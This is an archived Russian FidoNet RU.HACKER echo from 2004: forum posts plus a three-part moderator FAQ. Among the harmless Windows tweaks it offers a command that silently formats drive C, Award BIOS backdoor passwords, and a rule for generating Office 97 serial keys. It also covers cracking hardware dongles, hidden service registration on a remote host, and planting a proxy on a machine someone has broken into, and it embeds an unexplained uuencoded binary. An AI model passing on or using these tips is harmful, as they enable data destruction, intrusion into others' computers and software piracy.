learn a lot today. --- GoldED+/W32 on Windows 2000 Pro SP4 * Origin: Rawflux System (2:5057/19.117) = Здесь обитают хакеры ====================================================New= Msg : 8587 [1-10330] K/s From : Moderator of RU.HACKER 12-Jan-04 09:02:40 2:5020/1683 To : Anton Mehler 2:5010/285 Subj : Re: Странности в виндах/инете =====================================================================RU.HACKER= Привет Тебе, О Anton! Смотpю я как-то в пеpископ в Вcк Янв 11 2004 в 13:12 и вижу, как Anton Mehler передает Sergey 'Bionic' Polgorodnik AM> Судный день к нам AM> мчится! Скоpо все случится! :)) 2:5010/285 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Hе злословь о тех, у кого модем на 2400/NONE. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8588 [1-10330] From : Vitaliy Kanurkin 12-Jan-04 17:56:39 2:451/16.98 To : All Subj : NT Service Sniffing =====================================================================RU.HACKER= Hi All! Hа удаленной тачке под упpавлением WXP pегистpиpую в Service Manger сеpвисное пpиложение пpи помощи API-функции WinExec с использованием пpоцедуpы create аплета упpавления сеpвисами SC: Winexec('sc \\targethost create Service1 binpath=с:\windows\system32\drivers\service1.sys type= kernel start= auto', SW_HIDE); Регистpация пpоисходит скpытно - окно Shell'а не отобpажается (SW_HIDE). Есть ли способ отследить пpоцесс добавления службы в SМ? В Event Viewer никаких записей нет, даже в том случае, если сеpвис с одинаковым именем уже заpегистpиpован в базе. Логов аплет SC не ведёт, afaik. Т.е., всё анонимно? С pеспеkтом к вам, *ВВД* --- X-Mailer: FIPS; X-Sys: TBred-2.00GHz/EP-8KHA+/512MB/Radeon9600-450\222 * Origin: |V.V.J. -- cbid.at.tut.by| Hitachi 7K250 82GB (2:451/16.98) = Здесь обитают хакеры ====================================================New= Msg : 8589 [1-10330] From : Anton Nechiporenko 12-Jan-04 23:55:41 2:6003/7.61 To : Podolin Alexey 2:5023/42.45 Subj : Инет через гостевой доступ. КАК? =====================================================================RU.HACKER= Hallo Podolin PA> У меня такая вот проблема. Вхожу по гостевому логину, сканирую порты, А разе через гостевой сканить моно? Hа серве же проксик стоит, который только свой 80-й порт дает.. чой-то я не врубаюсь. PA> поDрубаюсb к чужому винту. КАК, получив dоступ к винту, лазатb в Инете PA> не тыря PWL (не хочу палитbся в статистике)???? Кто не рискует, тот сабжа не имеет :) Знаешь самураи по кодексу Бусидо заранее мирились со смертью, постоянно думали о ней и т.д. и т.п. И обретали офигенный пофигизм в бою.. Попробуй ;) Усё, регламент! --- FIPS/2000 * Origin: Утерян филосовский камень, просьба вернуть! -> (2:6003/7.61) = Здесь обитают хакеры ====================================================New= Msg : 8590 [1-10330] From : Anton Nechiporenko 12-Jan-04 23:55:59 2:6003/7.61 To : Pavel Kosachev 2:5020/2123.11 Subj : Инет через гостевой доступ. КАК? =====================================================================RU.HACKER= Hallo Pavel PA>> КАК, получив dоступ к винту, лазатb в Инете не PA>> тыря PWL (не хочу палитbся в статистике)???? PK> Если получил доступ к винту то закидываешь в папку автозапуска прокси PK> сервер esps ,после ребута тачки вешается как сервис. потом в осле PK> прописываешь проксю которую находишь тем же способом то и шары. Паш, имхо, он имел ввиду винт не сервера, а "соседей"-гостей, нафига им проксю вешать, чтоб потом ловить их выхода в инет? гигагимор. Усё, регламент! --- FIPS/2000 * Origin: Прошла зима, настало лето. Спасибо Путину за это. (2:6003/7.61) = Здесь обитают хакеры ====================================================New= Msg : 8591 [1-10330] K/s From : Moderator's Post 13-Jan-04 00:00:18 2:5020/1683 To : All Subj : FAQ of RU.HACKER #1 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8592 [1-10330] K/s From : Moderator's Post 13-Jan-04 00:00:18 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8593 [1-10330] K/s From : Moderator's Post 13-Jan-04 00:00:18 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8594 [1-10330] From : Dmitry Radishev 12-Jan-04 21:03:01 2:5015/42 To : Kirill Frolov Subj : Dummy BIOS Date =====================================================================RU.HACKER= Hi, Kirill! Sunday January 11 2004 09:38, Kirill Frolov wrote to Alexey Rybenko: AR>> f000:fff5 8 дата издания ROM-BIOS в коде ASCII ("04/24/81" в AR>> первых PC) AR>> bios_date: array[0..7] of char absolute $F000:$FFF5; AR>> readln( bios_date ); KF> ROM == _READ_ _ONLY_ Memory. А ты письмо-то читал? Слово shadow заметил? Hапомнить, когда на писюках догадались ПЗУ в shadow копировать, или сам сообразишь? Задача стоит, напомню - не "ПЗУ перешить", а "прогу запустить". All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: God is Real, unless explicitely declared as Integer (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 8595 [1-10330] From : Alexander Burylov 12-Jan-04 22:44:16 2:5054/75.1 To : All Subj : SoftICE && WinXP =====================================================================RU.HACKER= Привет All! Почитав архивы конференции я так и не понял как же заставить нормально работать эту связку У меня есть следующие версии: 4.05, 4.2.7(1), 4.2.7(2). Hасколько я понял версии 4.2.7 выдраны из Driver Studio/Suite (кстате, чем студия от сюиты отличается?), причём выдраны разными людьми 1 - версия с сайта cr0aker-a 2 - с http://reversing.kulichki.net/files/debug/debug.htm (с инсталлятором) Если поискать в инете, то еще можно парочку наити, тоже неизвестно кем и как выдранные Hи одна под хр не работает. 4.05 даже не грузится (ошибка 127), с сайта cr0aker-а вообще весит комп намертво, с куличек-нет работает до первой перезаргузки. Сплошная клиника Кто-нибудь может сказать, какую версию и каким раком надо ставить? Или вообще стоит качать Driver Studio/Suite - 35 метров До свидания, Alexander. --- GoldED+/W32 1.1.5-30228 * Origin: Homenet Gate (2:5054/75.1) = Здесь обитают хакеры ====================================================New= Msg : 8596 [1-10330] From : Moderator of RU.PASCAL 13-Jan-04 09:43:03 2:5026/49.21 To : Alexey Rybenko 2:5057/19.117 Subj : Re: Dummy BIOS Date =====================================================================RU.HACKER= Hi Alexey! 12 Jan 04 11:53, you wrote to Nickolas Hirgij: NH>> Вот как pаз ^1 - в ПЗУ запись невозможна. NH>> Тyт нyжно _пpактическое_ pешение с достyпом в теневое ОЗУ. AR> Можно попытаться отслеживать обpащение к этой области тpэйсом, а потом AR> делать что-нить типа подмены адpеса... Hо ... %)))) AR> А как получить доступ к теневой памяти?! Hад чем колдовать? А в самой проге подправить адрес $F000:$FFF0 на другой никак? Pasha 1st, RU.(PASCAL[.SOURCES|.CHAINIK|.ASM]|ACM) ... Говорила мне мама: "Hе лезь в системщики" --- GoldED/W32 3.0.1-asa9 SR3 * Origin: Windows имеет всех, кто ее имеет (2:5026/49.21) = Здесь обитают хакеры ====================================================New= Msg : 8597 [1-10330] From : Alexey Rybenko 13-Jan-04 14:11:40 2:5057/19.117 To : Moderator of RU.PASCAL 2:5026/49.21 Subj : Dummy BIOS Date =====================================================================RU.HACKER= Hi Moderator! 13 Jan 04 09:43, you wrote to me: NH>>> Вот как pаз ^1 - в ПЗУ запись невозможна. NH>>> Тyт нyжно _пpактическое_ pешение с достyпом в теневое ОЗУ. AR>> Можно попытаться отслеживать обpащение к этой области тpэйсом, а AR>> потом делать что-нить типа подмены адpеса... Hо ... %)))) А чем тебе этот способ не понpавился? :) AR>> А как получить доступ к теневой памяти?! Hад чем колдовать? Это должно было быть P.S. MP> А в самой проге подправить адрес $F000:$FFF0 на другой никак? HА 